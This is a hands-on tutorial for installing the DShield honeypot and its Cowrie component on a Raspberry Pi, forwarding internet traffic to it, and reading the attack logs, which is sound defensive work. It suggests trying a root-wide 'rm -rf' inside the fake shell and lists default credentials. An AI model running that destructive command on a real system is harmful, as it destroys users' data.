DSHIELD PI HONEYPOT
Use a Raspberry Pi to trick hackers into thinking they’ve found a juicy target, then study them like ants in a jar.
Baiting attackers towards your own hardware might not seem a particularly good idea, but if that hardware has nothing of value on it, and is suitably isolated from your other machines, then you can more or less lure them in with impunity. The goal of setting up a honeypot is not to revenge-hack attackers, but rather to detect attacks, and distract those responsible from more valuable targets.
Opening your home network up to the internet isn’t something that should be done lightly, though. If the honeypot machine was to be compromised, then it could be used as a staging post for attacking any services running on your network, including your home router. If you were foolish enough to run a honeypot on your desktop PC, then it’s possible that an attacker would gain not only root access it, but to all your files, passwords, browser history, and anything else you use it for.
DShield is an easy-to-use honeypot that can be installed anywhere. The Raspberry Pi is ideal for this because it’s cheap and the SD card can easily be wiped if something goes wrong. DShield is a distributed intrusion-detection system created by the Internet Storm Center (ISC). In its own words, “DShield collects data about malicious activity from across the internet. This data is catalogued and summarised and can be used to discover trends in activity, confirm widespread attacks, or assist in preparing better firewall rules.” So setting up a Pi-based DShield sensor, as they’re termed, will help the security of the internet in some small way. DShield uses Cowrie, which runs dummy SSH, web, and other services to tempt attackers and gather data about what they’re trying to do.
Get started with DShield
Before you can use it you’ll need to join the project by
setting up an account at https://dshield.org. DShield can be installed on any Linux distribution via Git, and some tweaks are necessary to install it on the Pi. Check the project’s Github at https://github.com/ DShield-ISC/dshield if our instructions here fail you. Before we get to DShield, though, we need to ensure that our Pi is correctly set-up. We’d recommend starting with a fresh installation of Raspberry Pi OS Lite. If you don’t have a monitor and keyboard for your Pi to hand, then you can activate the SSH server and interact with it that way by placing an empty file called ssh on the SD card’s boot partition: $ touch /media/user/boot/ssh
After that, you can use Nmap to help you find the Pi’s IP address on your local network with something like: $ sudo nmap -p22 –open 192.168.0.*
which will search the network for devices running on the default SSH port. Your Pi should be easy to spot because it’ll show up as a Raspberry Pi Foundation device. Log in (either by SSH or physically) using the default pi:raspberry credentials.
Ensure the date is set correctly by running: $ date
If it isn’t, then you’ll end up generating invalid SSL certificates, and various other things will fail mysteriously. It’s also worth running raspi-config for the purposes of changing the default password, making SSH permanently active, ensuring the correct timezone is set, and expanding the filesystem to use the entire SD card. Before you reboot, it’s worth upgrading everything (which will take some time so a cup of coffee is recommended), and installing Git. $ sudo apt update $ sudo apt upgrade $ sudo apt install git $ sudo reboot
“If the honeypot machine was to be compromised, then it could be used as a staging post for attacking any services running on your network, including your home router.”
Reconnect to your Pi and clone the DShield repository: $ git clone https://github.com/DShield-ISC/dshield.git
Then run the installation script: $ cd dshield/bin $ sudo ./install.sh
The script will install lots of packages (you probably have time for another cup of coffee during this phase) and then give you one last chance to bail out. Do heed this warning: if you proceed it will ask you for your email address and API key, which you set up earlier. The key is in the My Account section on the website. Next, you’ll be asked for a network interface (wired is recommended) and which networks and IPs to trust. It figures these out based on machines currently connected to the Pi. As part of the bait, a bogus SSH instance will take over the default port, so after this step you’ll need to SSH to port 12222 to administer DShield. Finally, some Python packages will be installed via Pip, and a certificate will be generated (it’s okay to accept all the defaults here). And by now you’ve definitely earned that third cup of coffee.
Reboot the Pi again and SSH to the new admin port, and check all is well with DShield: $ ssh -p 12222 pi@192.168.x.x $ cd dshield/bin $ sudo ./status.sh
You should see an error saying that the webserver is not exposed. To attract bots and humans from outside your network, you need to tell your home router to forward incoming connection attempts to the Pi. You may already have some forwarded ports set up, either manually or via uPNP. Each router is different, but most have a DMZ (demilitarised zone) option, which will forward all traffic that wouldn’t be forwarded elsewhere. You could also forward only selected ports, but the goal of DShield is to capture as much traffic as possible, so this isn’t really recommended.
To see connection attempts in real time, run: $ tail -f /var/log/dshield.log
Follow the action
Besides logging usernames and passwords for any attempts to login, Cowrie – another honeypot – will also fake a command shell to several common usernames and passwords and capture the whole session. Any URLs requested from the webserver are also collected. Follow Cowrie activity with: $ tail -f /srv/cowrie/var/log/cowrie/cowrie.log
If you want to play around in Cowrie’s faux shell, just SSH to your router’s external IP address (Cowrie doesn’t listen on the internal address) using the credentials root:password . Lots of standard shell commands will appear to work correctly, but if you try something like rm -rf on the root directory you’ll quickly see that it’s all trickery. Everything you type is logged, and you can grep it out of the logs (after first logging out of Cowrie’s deceptive shell) with: $ grep CMD /sr v/cowrie/var/log/cowrie/cowrie.log
It’s important to not take these personally, and remember that most of these will be automated scans and bots. DShield is configured to send logs every half hour via a cron job. After that time your data will be visible from the My Account menu at the DShield portal.
Cowrie is designed to mimic services, but also to be very simple behind the scenes. This reduces the possibility of it actually falling to a vulnerability at some stage. After a few hours’ use, our logs started to show a few Python tracebacks resulting from Cowrie crashing out. This is in general nothing to worry about. In theory that’s not meant to happen, and those tracebacks are sent to the project to stop them happening in future.